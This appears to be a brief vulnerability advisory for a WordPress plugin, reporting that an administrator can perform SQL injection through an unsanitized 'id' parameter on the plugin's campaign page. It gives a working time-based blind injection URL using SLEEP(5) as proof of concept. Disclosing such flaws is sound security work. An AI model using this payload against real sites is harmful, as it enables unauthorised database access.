Description The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admin+ to perform SQL injection attacks
As an admin open a link like:
http://example.com/wp-admin/admin.php?page=enl-campaigns&action=campaign-run&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)
There will be a delay indicating that the injection has succeeded.